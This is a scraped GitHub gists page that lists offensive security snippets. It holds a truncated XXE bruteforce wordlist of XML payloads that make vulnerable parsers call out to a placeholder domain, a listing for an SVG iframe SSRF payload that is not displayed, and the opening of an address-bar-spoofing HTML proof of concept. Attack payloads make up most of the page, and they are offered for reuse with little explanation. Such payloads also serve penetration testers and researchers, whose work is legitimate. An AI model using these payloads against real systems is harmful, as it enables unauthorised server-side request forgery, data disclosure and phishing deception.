GOTCHA techinque PoC
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device;height=device">
<title>GOTCHA PoC</title>
jimen0
/ xxe-payloads.txt
Created
September 14, 2020 13:43
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
jimen0
/ ssrf_iframe.svg
Created
August 8, 2019 10:22
— forked from akhil-reni/ssrf_iframe.svg
SVG Foreign Objects IFrame SSRF
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
jimen0
/ GOTCHA PoC.md
Created
June 28, 2019 10:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> | |
| <html> | |
| <head><title>address bar spoofing</title> | |
| <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> | |
| </head> | |
| <body><h1>address bar spoofing</h1> | |
| <li>Please click the button to run the proof of concept. <button id="one">Demo</button></li> | |
| <script type="text/javascript"> | |
| document.getElementById('one').onclick = function() { | |
| myWindow=window.open('http://underc0de.org/','Underc0de','width=200,height=100,location=yes'); |